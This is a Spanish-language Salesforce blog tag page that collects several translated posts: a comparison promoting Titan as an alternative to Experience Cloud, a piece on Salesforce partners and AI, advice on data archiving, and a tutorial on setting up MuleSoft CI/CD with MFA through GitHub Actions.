Etiqueta: seguridad

Las Mejores Alternativas a Salesforce Experience Cloud

Última actualización el 22 de septiembre de 2023 por Rakesh Gupta

Gran idea o pregunta duradera:

¿Cuáles son las mejores alternativas a Experience Cloud del mercado? ¿Y es posible encontrar una herramienta sin código que le permita crear portales y aplicaciones totalmente personalizables?

Objetivos:

Después de leer este blog, tendrás:

Comprensión de Salesforce Experience Cloud, incluidas sus fortalezas y debilidades.
Conocimiento de los pros y los contras de utilizar desarrollo personalizado para crear portales y aplicaciones web.
Una introducción a Titan Web, con una explicación de cómo esta herramienta de código cero puede brindarle la libertad de crear cualquier aplicación web o portal que desee.

El director de ventas Eric Brown se acercó a Isabella Stewart , administradora de Salesforce en Gurukul On Cloud (GoC). Eric quiere un sistema totalmente digitalizado para gestionar los procesos internos de recursos humanos. La directora de recursos humanos y su equipo están muy ocupados utilizando procesos manuales y parcialmente digitalizados para contratar, gestionar nóminas y cuidar el bienestar de los empleados. ¡Asegurarse de que todo el papeleo y la administración estén actualizados es una pérdida de hasta 12 horas cada semana! Está empezando a ser abrumador.

La empresa quiere un portal para empleados rentable y totalmente personalizable, integrado con Salesforce, que no requiera codificación ni conocimientos técnicos especiales para su implementación. Saben que Salesforce Experience Cloud es una posible solución, pero también les preocupa que sea costoso y no lo suficientemente flexible para sus necesidades. Entonces, ¿cuáles son las alternativas de Experience Cloud ?

Experiencia en la nube

Salesforce Experience Cloud, anteriormente conocida como Salesforce Community, se introdujo en 2013 como una plataforma para crear comunidades en línea de marca. A lo largo de los años, Salesforce Experience Cloud evolucionó con actualizaciones y mejoras. Hoy en día, sirve como una solución integral para crear portales atractivos, aplicaciones web, comunidades y experiencias de autoservicio, lo que permite a las organizaciones ofrecer interacciones fluidas e impulsar el compromiso de clientes, socios y empleados.

La creación de aplicaciones web y portales de autoservicio con Experience Cloud puede mejorar la experiencia de sus empleados en el lugar de trabajo y aliviar la presión de su departamento de recursos humanos. Un portal de autoservicio o una aplicación web creada con Experience Cloud proporciona a los empleados acceso directo a su información personal y profesional, lo que facilita la actualización de información y registros en cualquier momento o lugar.

Echemos un vistazo más de cerca a algunas de las ventajas y desventajas de utilizar Experience Cloud para crear portales para su organización.

Las mayores ventajas de Experience Cloud:

Plantillas listas para usar para impulsar su implementación
Soluciones Lightning Bolt disponibles de forma gratuita o compradas en Salesforce AppExchange
Acceso completo a los datos de Customer 360 guardados en Salesforce
Salesforce Experience Cloud funciona a través de un software intuitivo de arrastrar y soltar, por lo que no es necesario tener ninguna experiencia técnica especial ni conocimientos de codificación.
Dado que Experience Cloud es nativo de Salesforce, no es necesario realizar ningún trabajo de integración adicional. El software ya habla el idioma de los administradores de Salesforce y tiene la interfaz de usuario con la que estarían familiarizados.
Puedes crear páginas públicas y privadas. La ventaja de esto es que sólo los usuarios con los permisos de acceso adecuados podrán visitar espacios específicos.
Las opciones listas para usar de Experience Cloud le brindan G2M rápido y lo más probable es que pueda crear su portal o sitio en uno o dos días.
También tiene la opción de diseñar su portal o sitio web de la manera que desee utilizando imágenes y colores personalizados para que coincidan con la apariencia de su marca.
Listo para dispositivos móviles

Contras de Experience Cloud:

Las opciones listas para usar no le brindan mucha flexibilidad para personalizar y ajustar el diseño de su página para satisfacer sus necesidades.
Experience Cloud es algo limitado desde la perspectiva de la experiencia del usuario; por ejemplo, no puede utilizar elementos repetidos, edición en línea de tablas, pantallas modales y otros elementos atractivos. Por ejemplo, es posible que desee crear un elemento que abra la biblioteca de cámaras del usuario al hacer clic en él, pero con Salesforce Experience Cloud esto es imposible.
Salesforce Experience Cloud es definitivamente caro, por lo que si desea optar por esta solución, prepárese para pagar
No se puede diferenciar entre la experiencia del usuario de escritorio y móvil usando opciones listas para usar. Para ello es necesario recurrir al desarrollo personalizado.
Sin validaciones de entrada en tiempo real. Primero debes hacer clic en el botón “Guardar”.
Las integraciones fuera de Salesforce son tareas complejas y requieren un desarrollo extenso
Hay una cantidad limitada de plantillas disponibles y estas solo cubren casos de uso específicos. Esto significa que es posible que no encuentre la plantilla adecuada para las necesidades de su negocio.

Ejemplo de plantillas de Salesforce Experience Cloud a continuación. Crédito: https://www.salesforce.com/products/experience-cloud/features/templates/

¿Puede el desarrollo personalizado superar las limitaciones de Experience Cloud?

Aprovechar los recursos del desarrollo personalizado es otra forma de crear un portal o sitio web que se adapte a las necesidades de su negocio. Y en muchos sentidos, esta opción le ayuda a superar las limitaciones de Experience Cloud. Estas son algunas de las principales razones para utilizar el desarrollo personalizado, así como sus inconvenientes:

Ventajas del desarrollo personalizado:

Lo bueno de utilizar el desarrollo personalizado para crear sus aplicaciones y portales es que puede hacer lo que quiera con su lienzo en blanco, por ejemplo, integrarlo con múltiples sistemas externos a Salesforce.
Puede emplear desarrolladores para crear cualquier UX que desee, de modo que no esté limitado a Salesforce UX al determinar la experiencia que tienen los clientes cuando visitan su sitio.
Puedes crear diseños dinámicos para cualquier dispositivo, por ejemplo, portátil o móvil, sin restricciones.
Su portal o sitio puede personalizarse para cualquier caso de uso que se le ocurra. ¡Si puedes soñarlo puedes hacerlo!
Proporciona mayor control y propiedad: con un portal o sitio web de desarrollo propio, las organizaciones tienen total propiedad y control sobre la propiedad intelectual, el código fuente y las mejoras futuras.

El desarrollo personalizado ofrece la gran ventaja de brindarle libertad absoluta para crear el portal de sus sueños sin barreras, restricciones ni compromisos. Pero este método no está exento de desventajas. Vea a continuación algunos de los principales puntos débiles:

Desventajas del desarrollo personalizado:

Falta de experiencia técnica: desarrollar un portal o una aplicación web requiere habilidades y recursos técnicos especializados
Limitaciones de tiempo y recursos: crear una aplicación o un portal web puede ser un proceso que requiere mucho tiempo y una inversión significativa.
La salida al mercado puede verse seriamente retrasada, lo que podría afectar negativamente a sus objetivos comerciales.
Rápidos avances tecnológicos: el panorama tecnológico evoluciona continuamente y periódicamente surgen nuevas características, marcos y plataformas. Desarrollar una aplicación web o un portal internamente requiere mantenerse actualizado con las últimas tecnologías y mejores prácticas.
Desafíos de mantenimiento y soporte: una vez que se desarrolla un portal de autoservicio o una aplicación web, el mantenimiento y el soporte continuos son esenciales para su buen funcionamiento.
Básicamente, dependerá de los recursos de desarrollo y se verá paralizado cuando desee realizar actualizaciones simples. ¡No suena divertido!
Problemas de integración: desarrollar una aplicación web o un portal internamente puede plantear conflictos de integración con sistemas, bases de datos o servicios de terceros existentes.
Consideraciones de seguridad y cumplimiento: crear una aplicación o un portal seguro implica implementar medidas de seguridad sólidas y garantizar el cumplimiento de las normas de protección de datos.
Centrarse en las competencias básicas: las organizaciones deben evaluar si el desarrollo de una aplicación o portal se alinea con sus competencias básicas y prioridades estratégicas.
¡Dinero dinero dinero! Esta es definitivamente tu opción más cara, así que prepárate para acumular una factura.

¡Haciéndolo todo con la plataforma de experiencia digital de Titan!

Titan es una plataforma de experiencia completa que le brinda la libertad de crear sus propios portales, sitios de autoservicio, formularios de Salesforce , encuestas y mucho más. Y es una de las mejores alternativas a Experience Cloud del mercado.

Titan es una plataforma sin código con una interfaz intuitiva de arrastrar y soltar que permite a los administradores de Salesforce crear y configurar sitios web potentes para cualquier industria y caso de uso. Entonces, la verdadera pregunta es: ¿cómo se compara Titan con Experience Cloud? ¿Tiene también ventaja sobre el desarrollo personalizado? A continuación, detallamos cómo Titan Web puede permitirle crear sitios web impresionantes y portales personalizados:

Puntos ganadores de Titán:

Plataforma de código cero con una interfaz sencilla de arrastrar y soltar, por lo que no necesita gastar dinero en desarrollos costosos
Integración bidireccional en tiempo real con Salesforce y acceso completo a Customer 360
Plantillas listas para usar para acelerar su comercialización
Experiencia de usuario 100 % flexible por dispositivo para viajes de cliente personalizados
Totalmente de marca para que coincida con la apariencia de su organización.
El enfoque móvil primero le brinda la capacidad de escalar
Totalmente seguro y compatible con los principales marcos regulatorios como GDPR, SOC 2 e HIPAA
Cree perfiles personalizados para clientes y socios que sean fáciles de implementar
Genere documentos y fírmelos desde su aplicación o portal
Capacidades sin conexión para que pueda utilizar esta herramienta incluso cuando esté fuera del alcance de Internet
Compatible con múltiples idiomas y monedas
Integraciones integradas de terceros
Capacidades completas de gestión de versiones
Rentable en comparación con la competencia

Ahora, echemos un vistazo a las desventajas de Titan:

El tiempo de incorporación puede variar entre 4 y 20 horas, según la complejidad de su caso de uso.
Ocasionalmente, para una lógica o un diseño de diseño muy complejos, una organización necesitará agregar código JS y/o CSS para ajustarse a sus necesidades.
El dominio/subdominio del sitio web está limitado a uno por cliente. Se pueden comprar dominios adicionales por un costo adicional

El arma secreta de Titan es su poder para crear aplicaciones web totalmente personalizables sin tener que escribir una sola línea de código. Sin concesiones ni agendas ocultas para que pueda acelerar su comercialización.

Comparación de Experience Cloud frente a la competencia

Arriba, profundizamos en Salesforce Experience Cloud y sus principales alternativas. Pero, ¿cuál es el resultado final y quién sale como el verdadero ganador? Eche un vistazo a nuestra tabla comparativa a continuación para descubrirlo:

	Experiencia en la nube	Desarrollo a la medida	Plataforma Titán
Costo	Medio	Muy caro	Medio
Hora de comprar	Corto	Largo	Muy corto
Esfuerzo de mantenimiento prolongado	Bajo	Muy alto	Bajo
Recursos necesarios para el proyecto	Administrador de SF	Desarrolladores	Administrador de SF
Flexibilidad de diseño	Muy poco	Lleno	Lleno
Experiencia de usuario	Lo mismo que Salesforce. No puedes crear tu propia experiencia de usuario	Puedes desarrollar cualquier cosa que puedas soñar.	Casi todo lo que puedas soñar
Marca	Sí con temas personalizados	Sí	Sí con temas personalizados
Integración de Salesforce	Sí	Requiere desarrollo por integración.	Sí
Integraciones de terceros	Requiere complementos pagos o desarrollo	Requiere complementos pagos o desarrollo	Sí
Validaciones de datos en tiempo real	No	Sí	Sí
Flujo de trabajo y automatización	Sí	No	Sí
Móvil	Listo para dispositivos móviles	Diseño completamente dinámico por dispositivo	Diseño completamente dinámico por dispositivo
Conocimiento de Salesforce	Compatible	Requiere desarrollo	Compatible
Compromiso digital de Salesforce	Compatible	Requiere desarrollo	Compatible

Depende 100% de usted decidir las funciones y capacidades que necesita para crear los sitios web y portales de sus sueños. Pero está claro que si está buscando una herramienta web sin código, ultraflexible y rentable que mejore la experiencia del usuario, Titan es una excelente opción.

Quizás recuerde que anteriormente en este artículo una empresa estaba buscando una solución flexible y sin código para crear un portal de recursos humanos para los empleados. Eligieron utilizar Titan y estos son los resultados:

Los empleados inician sesión en el portal:
Reciben una autenticación de dos factores enviada a su correo electrónico para que puedan iniciar sesión en el portal sin administrar ninguna otra contraseña.
Las páginas web y los portales se muestran dinámicamente según la autenticación del usuario, proporcionando una experiencia de usuario dinámica con cada clic.
Todo está construido sólo con herramientas de arrastrar y soltar. No es necesaria ninguna codificación, ya que todos los datos fluyen hacia y desde Salesforce en tiempo real.
El Portal de Recursos Humanos brinda a los empleados un fácil acceso a información personal y profesional, lo que hace que sea muy conveniente actualizar registros y sus propios datos personales:
Los formularios digitales personalizados han eliminado los errores de entrada y las imprecisiones de los datos con el precompletado dinámico utilizando datos de Salesforce.
En el pasado, cada vez que un empleado quería reservar sus días de vacaciones, tenía que completar un formulario de licencia manual, escanearlo y enviarlo por correo electrónico a Recursos Humanos para su aprobación. Ahora simplemente hacen clic en la pestaña de días de vacaciones para gestionar las solicitudes de licencia.
El Portal de Recursos Humanos del Empleado permite a los empleados registrar pedidos de equipos de TI directamente desde sus dispositivos móviles, computadoras portátiles y de escritorio.
Los empleados pueden presentar solicitudes de gastos de la empresa antes de que se procesen para la nómina y pueden presentar las solicitudes para recibir el pago antes de la fecha límite de nómina. Esto significa que no hay que esperar a que se paguen las reclamaciones de gastos.
Incluso hay un Centro de conocimiento donde los empleados pueden obtener respuestas a todas sus preguntas frecuentes y solucionar problemas rápidamente:
Recursos Humanos ahorra 40 horas al mes en trabajo manual (¡incluida la nómina!) y los empleados están más comprometidos.
La empresa logró hacer todo esto dentro del presupuesto y en un tiempo récord, sin tener que implementar ningún código ni desarrollo personalizado.

Prueba de concepto

Consulte este portal de recursos humanos sin código donde los empleados pueden iniciar sesión y realizar diversas acciones de autoservicio:

[contenido incrustado]

Salesforce Experience Cloud es una solución conocida con un historial decente en permitir a las empresas crear aplicaciones y portales para mejorar la experiencia del cliente. Aun así, no está exento de limitaciones: falta de flexibilidad en lo que respecta a la experiencia del usuario, ninguna opción real para diferenciar entre la experiencia de escritorio y móvil, y dificultad para integrarse con herramientas fuera de Salesforce, ¡por nombrar solo algunas!

Utilizar el desarrollo personalizado para crear su propia aplicación o portal personalizado resolverá la mayoría de los mayores problemas de Experience Cloud. Con el desarrollo personalizado, obtienes total libertad para crear cualquier portal o aplicación que puedas soñar y obtener diseños dinámicos para cualquier dispositivo. Si bien el desarrollo personalizado mitiga los puntos débiles de Experience Cloud, esta solución presenta sus propios desafíos, que incluyen trabajo y mantenimiento de desarrollo complicados, gastos adicionales y una comercialización más lenta.

Titan gana a lo grande al brindarle lo mejor de ambos mundos: obtiene software de arrastrar y soltar combinado con la libertad y flexibilidad que brinda el desarrollo personalizado. Si está buscando la alternativa líder a Experience Cloud y le gustó lo que leyó, ¡póngase en contacto hoy!

Evaluación formativa

¿Qué es lo que aprendiste de esta publicación? ¿Cómo imagina aplicar este nuevo conocimiento en el mundo real? Siéntete libre de compartir en los comentarios a continuación.

Seguir leyendo

La importancia de la colaboración de socios en la revolución de la IA

Si ha utilizado una de las herramientas gratuitas de IA generativa disponibles, habrá visto lo innovadora que puede ser esta tecnología. Introducir indicaciones simples puede generar respuestas complejas y producir resultados complejos y sofisticados. Sin embargo, todavía se están explorando las aplicaciones comerciales de esta tecnología. Una cosa está clara: estamos en medio de la última revolución tecnológica. Al igual que la computación en la nube reformuló el panorama empresarial, el potencial de la IA + Datos + CRM cambiará el campo de juego de los negocios tal como los conocemos.

Es por eso que Salesforce está colaborando con nuestro poderoso ecosistema de socios para brindarle soluciones de IA que tengan aplicaciones comerciales claras. Con la armonía de IA + Datos + CRM, Salesforce le brinda las herramientas para utilizar el poder de la IA y la capacidad de poner a sus clientes en primer lugar.

Los socios de Salesforce comparten sus opiniones sobre la IA

Nuestros socios más influyentes están preparados para la revolución de la IA. Descubra cómo nuestro ecosistema de socios está creando soluciones empresariales específicas con la tecnología de Salesforce.

Allanando un camino confiable hacia el valor de la IA

Nuestro equipo de investigación de IA de Salesforce ha estado desarrollando grandes modelos de lenguaje (LLM) durante varios años y fue pionero en ingeniería rápida en 2018. Invertir en nuestra gente y socios es fundamental para el éxito. De hecho, Salesforce emplea a más de 1500 ingenieros de aprendizaje automático y científicos de datos en toda la empresa.

Y con Einstein , hemos creado la primera IA del mundo para CRM, que ahora impulsa más de 1 billón de predicciones cada semana en todo el conjunto de aplicaciones Salesforce Customer 360. Conla IA generativa , Einstein está haciendo que todas las empresas y empleados sean más productivos y eficientes en ventas, servicios, marketing y comercio.

Las innovaciones prosperan sobre una base de conocimiento sólido, confianza y experiencia diversa. Aquí es donde entra en juego nuestro vasto ecosistema de socios.

Adoptar un ecosistema de confianza

Salesforce comprende la importancia de tener la confianza como principio fundamental . La IA es una herramienta increíblemente poderosa con resultados potencialmente catastróficos si no se desarrolla teniendo en cuenta la responsabilidad. En Salesforce, cumplimos con las más altas prácticas de seguridad y privacidad porque nos esforzamos por proteger los datos que se nos confían.

El uso ético de la IA es de vital importancia y es una prioridad para todos nosotros en el ecosistema de socios. La confianza es una parte fundamental del diálogo y trabajamos estrechamente con socios y clientes para tomar decisiones informadas sobre cómo utilizar nuestra IA de manera responsable.

Al unirnos para resolver los desafíos emergentes, podemos garantizar que utilizamos la IA de forma segura y ética.

Innovando a través de la colaboración

Nuestro vasto ecosistema de socios contiene cientos de miles de expertos en tecnología Salesforce. Con su experiencia y conocimientos, aportan un profundo conocimiento de cómo se puede implementar y utilizar mejor Salesforce en industrias específicas.

Tenemos una larga historia de colaboración e innovación con nuestros socios, y las soluciones impulsadas por IA son la frontera más nueva que perseguimos juntos. Nuestros socios son expertos en sus campos. Al combinar eso con la tecnología de inteligencia artificial de Salesforce, podemos crear casos de uso y soluciones únicos que brindan valor de inteligencia artificial e infinitas posibilidades para nuestros clientes.

Mejore la productividad de la empresa con Einstein

Einstein le ayuda a vender más rápido, ganar más clientes y acelerar la eficiencia empresarial.

Aprovechando el poder de Einstein

Ofrecer éxito a los clientes es clave. Nuestros socios están colaborando con ingenieros y científicos de datos de Salesforce para prepararse para el futuro impulsado por la IA y crear productos listos para el mercado utilizando Einstein.

Sabemos que los clientes necesitan datos centralizados y sistemas consolidados. También quieren que se les permita utilizar la IA de una manera confiable que respete la seguridad y la privacidad de los datos. Echemos un vistazo más de cerca a estas últimas innovaciones :

Einstein es la solución completa para su viaje hacia la IA. Desde soluciones de ventas personalizadas que maximizan la productividad y agilizan los procesos hasta la automatización escalable del servicio al cliente que reduce los costos y mejora la eficiencia, Einstein ayuda a todos sus equipos a trabajar de manera más inteligente.

Al establecer nuevos estándares de la industria para la IA generativa segura, Einstein Trust Layer protege la seguridad de los datos de los clientes y cumple con las demandas de cumplimiento y gobernanza de datos. Es vital para garantizar a los clientes que pueden proteger los datos confidenciales de los mismos.

Encontrar el éxito de los socios y el valor de la IA

Desde mi perspectiva, se trata de confianza y responsabilidad de cara al futuro. Para la mayoría de nuestros clientes, este es el comienzo de su viaje hacia la IA. La IA puede transformar el funcionamiento de las empresas. Puede optimizar los procesos existentes y mejorar la eficiencia entre los equipos. Depende de todos nosotros mejorar y capacitar a nuestros empleados y clientes para que aprendan estas nuevas capacidades.

Salesforce entrevistó a otros pioneros de la IA en el World Tour de Londres para escuchar sus opiniones sobre cómo la IA generativa está cambiando la industria. En los siguientes artículos de esta serie del Día de la IA, analizamos los temas que nuestros socios más influyentes compartieron con nosotros. Explicaremos por qué la confianza, la transparencia y la seguridad de los datos son una prioridad. También profundizaremos en por qué Es esencial buscar casos de uso compatibles para satisfacer las necesidades de los clientes y cómo ser parte del ecosistema de socios ayuda a los socios a respaldar a nuestros clientes conjuntos.

¿No puedes esperar hasta entonces? Mire los videos del Día de la IA aquí .

Seguir leyendo

ai AMA Aplicaciones Automatización Capa de confianza de Einstein CI cli cola comienzo Cómo confianza Conocimiento Costo CRM cuenta Datos Datos de Salesforce Eficiencia EGA Futura Einstein Einstein Trust Layer Empresa Empresas expertos en tecnología Force.com ga Genie Herramientas IA generativa inteligencia inteligencia artificial Investigación Lead LLM Marketing Negocio Negocios Nube Otros pionero Proceso Product Productividad Producto productos Quip Respuesta Respuestas Salesforce Salesforce.com seguridad Socios de Salesforce Tecnología Tema Temas TI trust UI Ventas

Archivando datos, ¡no tan rápido!

En el mundo actual basado en datos, las empresas generan una gran cantidad de datos, incluidos registros de clientes, historial de transacciones y más. (No me hagas empezar con los LLM).

Gestionar estos datos de manera eficiente es clave para el buen funcionamiento de sus entornos de Salesforce, la capacidad de almacenamiento, el consumo de energía y también las regulaciones de retención de datos. Ahí es donde entra en juego el archivo de datos.

Como sabrás, paso un poco de tiempo todos los días en la 'comunidad de respuestas'. Así es como (hace muchos años) entré en la comunidad Salesforce Trailblazer. Así que trato de pasar un poco de tiempo allí todos los días. Y he visto algunas preguntas recientemente sobre este asunto. Así que pensé en ampliar el intercambio de conocimientos: escribamos este artículo, donde exploramos el archivo de datos y arrojamos luz sobre algunas consideraciones esenciales.

Antes de comenzar a archivar como si no hubiera un mañana, esto es lo que debe analizar:

Elegir los registros adecuados para archivarlos
El primer paso para crear una estrategia de archivo de datos es determinar qué registros deben archivarse. No es necesario archivar todos los datos; sólo se deben considerar aquellos que ya no se utilizan activamente pero que deben conservarse para fines históricos o de cumplimiento. Para los usuarios de Salesforce, esto podría incluir contactos antiguos de clientes, oportunidades cerradas o casos obsoletos.

En la mayoría de los casos, los datos pueden simplemente eliminarse. ¡No seas acaparador! Y eliminar conduce a un menor uso de almacenamiento, menos procesamiento, menos riesgos potenciales de seguridad y gobernanza, menos consumo de energía… ¡en definitiva, menos complicaciones!

¡Menos es más!

Acceder a datos archivados
Si bien los datos archivados generalmente se almacenan fuera del entorno principal de Salesforce, es crucial considerar cómo y si estos registros serán necesarios nuevamente .

Piense en la frecuencia con la que su equipo necesita acceder a datos archivados y
si debería estar disponible fácilmente o si
puede permitirse un proceso de recuperación más largo. También,
determinar si necesita ejecutar informes sobre datos archivados para análisis históricos o
fines de cumplimiento.

Matando el mito: ¡En este hilo reciente se propuso utilizar un objeto personalizado! ¡No hagas esto, no tiene sentido! El uso de almacenamiento será el mismo si se trata de un objeto estándar o personalizado (si no más).

Definición de períodos de retención
Los distintos tipos de datos pueden tener distintos requisitos de conservación. Por ejemplo, es posible que sea necesario conservar los registros financieros durante un período más prolongado que las consultas de los clientes.

Comprenda los períodos de retención específicos para su industria y ubicación, y asegúrese de que su estrategia de archivo se alinee con estas regulaciones.

Cumplimiento de las regulaciones de la industria
A riesgo de repetirme: el cumplimiento de la normativa de conservación de datos es primordial. Investigue si existen regulaciones específicas aplicables a su industria y ubicación .

Por ejemplo, el Reglamento General de Protección de Datos (GDPR) de la Unión Europea impone reglas estrictas sobre la retención y la privacidad de los datos.

Cumplir con estas normativas no es sólo un requisito legal sino también una forma de generar confianza con sus clientes. Y le ahorra molestias y estrés en el futuro.

Soluciones de archivo existentes
Considere qué soluciones de archivo ya existen en su organización. Algunas empresas pueden tener un sistema de archivo dedicado que puede o no integrarse perfectamente con Salesforce, mientras que otras pueden depender de procesos manuales.

Es muy fácil distraerse con la proliferación de aplicaciones, no te dejes cegar por las cosas brillantes. Comprender su configuración actual puede ayudarle a tomar decisiones informadas sobre cómo mejorar su estrategia de archivo.

No te olvides del escenario del “Regreso”
A veces, los datos archivados no desaparecen para siempre. Piense en escenarios en los que podría necesitar resucitar registros archivados, como un contacto de cliente previamente cerrado que regresa como un cliente potencial.

Asegúrese de que su sistema de archivo permita una fácil recuperación y reintegración cuando sea necesario. ¡Descubra qué situaciones podrían ocurrir, con qué frecuencia, cuánto volumen, etc., para que pueda diseñar el proceso basándose en decisiones informadas!

En conclusión, el archivo de datos eficaz es un aspecto crucial de la gestión de instancias de Salesforce. Al considerar cuidadosamente qué registros archivar, cómo acceder a ellos, períodos de retención, regulaciones de cumplimiento, soluciones existentes y la posibilidad de que los datos "regresen", su organización puede garantizar la integridad de los datos, el cumplimiento normativo y la capacidad de aprovechar los datos históricos. para necesidades futuras. ¡También aproveche el poder de ELIMINACIÓN!

¿Cuál es tu enfoque? ¿Qué más tiene en su lista al clasificar las solicitudes de archivo de datos?

Seguir leyendo

ai Análisis Aplicaciones CI cli cliente potencial Cómo Comunidad Comunidad de respuesta Comunidad Trailblazer confianza Conocimiento consulta contacto Contactos Data Datos Destacados EGA Futura Empresa Empresas Estrategia ga GDPR INCLUDE INCLUIR Informe Informes integración Lead LLM Objeto Opinión Oportunidad Plataforma Preguntas Proceso Procesos manuales Quip Registro Reglamento general de protección de datos Respuesta Respuestas Salesforce seguridad Sin categoría Tema TI Trailblazer UI

Habilitación de MFA en MuleSoft para canalizaciones de CI/CD mediante acciones de GitHub ☁️

Esta es una traducción que desde EGA Futura ofrecemos como cortesía a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoamérica .

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Habilitación de MFA en MuleSoft para canalizaciones de CI/CD mediante acciones de GitHub | Blog de desarrolladores de Salesforce

La mayoría de las cuentas empresariales de Anypoint Platform requieren que utilice mecanismos de autenticación multifactor (MFA) para mayor seguridad. Esto significa que, además de su nombre de usuario y contraseña habituales, necesitará un paso adicional para autenticarse (por ejemplo, una aplicación de autenticación en su teléfono).

Cuando utiliza canalizaciones de CI/CD para sus aplicaciones Mule y MFA está habilitado en su cuenta, la configuración para autenticarse usando el complemento Mule Maven será diferente que si solo estuviera usando su nombre de usuario y contraseña. Hay más pasos que debe seguir desde su cuenta de Anypoint Platform para habilitar sus canales de CI/CD con este método de autenticación.

En esta publicación, aprenderá cómo configurar una canalización de GitHub Actions para que funcione con su cuenta habilitada para MFA desde Anypoint Platform.

Requisitos previos

Crear una aplicación conectada

Dado que usar el nombre de usuario y la contraseña de su plataforma Anypoint no es suficiente para autenticarse en el proceso, debe crear una aplicación conectada para usar sus credenciales (ID/Secreto). Para crearlo, vaya a su cuenta de Anypoint Platform y navegue hasta Gestión de acceso > Aplicaciones conectadas > Crear aplicación .

Asigne un nombre a su aplicación para identificarla de otras que pueda crear. Por ejemplo, github-actions . Seleccione el tipo La aplicación actúa por sí sola y haga clic en el botón Agregar ámbitos .

Seleccione los siguientes 10 ámbitos.

Desarrollador del centro de diseño
Ver entorno
Ver organización
Perfil
Administrador de organización de CloudHub
Crear aplicaciones
Eliminar aplicaciones
Descargar aplicaciones
Leer aplicaciones
Leer servidores

Haga clic en Siguiente . Seleccione su grupo empresarial y haga clic en Siguiente . Seleccione su entorno (por ejemplo, Sandbox) y haga clic en Siguiente . Revise que los alcances sean correctos y haga clic en Agregar alcances . Haga clic en Guardar .

Una vez creada la aplicación, asegúrese de copiar tanto el ID como el Secreto . Los utilizará en la configuración de la canalización como método de autenticación.

Configura tus secretos de GitHub Actions

Vaya a su repositorio de GitHub. Haga clic en la pestaña Configuración > Secretos y variables > Acciones > Nuevo secreto del repositorio . En el campo de nombre, agregue CONNECTED_APP_CLIENT_ID . En el campo secreto, agregue la identificación real que acaba de copiar en el paso anterior. Repita este paso para crear otro secreto con el secreto real que copió en el paso anterior. Utilice el nombre CONNECTED_APP_CLIENT_SECRET .

Crear una canalización de CI/CD

De vuelta en el código de su aplicación Mule, cree una carpeta .github en el nivel raíz. Dentro de esta carpeta, cree otra carpeta llamada workflows . Dentro de esta carpeta, cree un archivo build.yml con el siguiente contenido: mule-mfa-cicd-build.yml . Tenga en cuenta que la sucursal main se utiliza en la línea 5. Si su sucursal tiene un nombre diferente, asegúrese de actualizar esta configuración.

En este archivo, describimos los pasos para generar el archivo JAR de nuestra aplicación Mule e implementarlo en nuestra cuenta de Anypoint Platform usando GitHub Actions. Observe que estamos usando los secretos creados previamente en el último paso para pasarlos a nuestro proyecto a través de Maven. Aquí declaramos dos variables de entorno Java ( client.id y client.secret ) para copiar las credenciales de nuestra aplicación de los secretos de GitHub para que el archivo pom.xml pueda usarse más adelante.

Modifica tu configuración de Maven

En su proyecto Mule, abra su archivo pom.xml. Localice el complemento org.mule.tools.maven en project/build/plugins . Agregue la siguiente configuración a este complemento.

<dx-code-block title language="xml" code-block=" org.mule.tools.maven mule-maven-plugin ${mule.maven.plugin.version} true https://anypoint.mulesoft.com 4.4.0 mulesoft-mfa-cicd Sandbox MICRO us-east-2 1 true ${client.id} ${client.secret} client_credentials
«>

Vuelva a verificar estas configuraciones en caso de que necesite actualizarlas para que coincidan con su caso de uso. Por ejemplo, muleVersion , applicationName , environment o region . Usaremos los campos connectedAppClientId y connectedAppClientSecret para pasar las variables Java que declaramos anteriormente en la configuración de Maven.

Es importante que no codifique las credenciales de la aplicación conectada en este archivo por razones de seguridad. Es por eso que mantenemos los valores como secretos de GitHub. Recuerda que puedes acceder a nuestro repositorio de ejemplo si necesitas comparar tu código con el nuestro.

ejecutar la tubería

Una vez que todas sus configuraciones estén listas, confirme y envíe sus cambios al repositorio remoto. Esto activará la canalización en GitHub. Puede ver el proceso haciendo clic en la pestaña Acciones de su repositorio de GitHub.

Una vez completado el proceso, su aplicación Mule se implementará en Runtime Manager. Tenga en cuenta que el archivo JAR contendrá el hash de confirmación en su nombre.

Conclusión

Habilitar canalizaciones de CI/CD es importante para automatizar tareas repetitivas. En lugar de implementar manualmente una aplicación Mule cada vez que hay un cambio en el código, podemos crear canalizaciones para que realicen estas tareas por nosotros. Este fue un ejemplo simple que utiliza solo una sucursal y un entorno, pero puede conectar otras sucursales a otros entornos en Anypoint Platform. Por ejemplo, dev , qa , prod , etc.

En esta publicación, aprendimos cómo implementar automáticamente una aplicación Mule en CloudHub cuando usamos la autenticación multifactor en nuestra cuenta de Anypoint Platform porque la mayoría de las cuentas empresariales tienen esta configuración habilitada. Sin embargo, cuando solo usa una cuenta de prueba gratuita, no necesita crear una aplicación conectada si no usa MFA en su cuenta. Puede utilizar su nombre de usuario y contraseña de Anypoint Platform para iniciar sesión.

Hay muchas cosas que puede automatizar al utilizar canalizaciones de CI/CD para sus aplicaciones Mule. Puedes ejecutar pruebas automatizadas antes de implementar tu aplicación Mule, por ejemplo. ¿Se te ocurren otras tareas repetitivas que puedas automatizar en tus canalizaciones?

Nota: Las versiones iniciales de la canalización se basan en el siguiente repositorio creado por Archana Patel: arch-jn/github-actions-mule-cicd-demo .

Recursos adicionales

Sobre el Autor

Alex Martínez formó parte de la comunidad de MuleSoft antes de unirse a MuleSoft como desarrollador defensor. Fundó ProstDev para ayudar a otros profesionales a aprender más sobre la creación de contenido. En su tiempo libre, encontrarás a Alex jugando juegos de Nintendo o Playstation y escribiendo reseñas sobre ellos. Siga a Alex en LinkedIn o en la comunidad Trailblazer .

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

Acciones de GitHub admin administrador Administradores ai AMA Anypoint Aplicaciones Apps Arquitecto Arquitectos Automatización Blogs Business CI CI/CD cli Cloud Cómo Comunidad Comunidad Trailblazer Conectar Connect Consultores CRO cuenta desarrollador Desarrolladores desarrolladores de Salesforce desarrollo de aplicaciones Dev EGA Futura Empresa flow Flows Force.com ga github grupo Herramientas html integración y API java LEx ML MuleSoft Ohana Otros Plataforma Plataforma MuleSoft Anypoint platform Podcast Proceso Prueba pruebas Reseñas Salesforce Salesforce.com sandbox seguridad Slack Tarea TI Tools Trailblazer Tutoriales UI Versiones

Creación de aplicaciones impulsadas por IA con LLM y Einstein ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

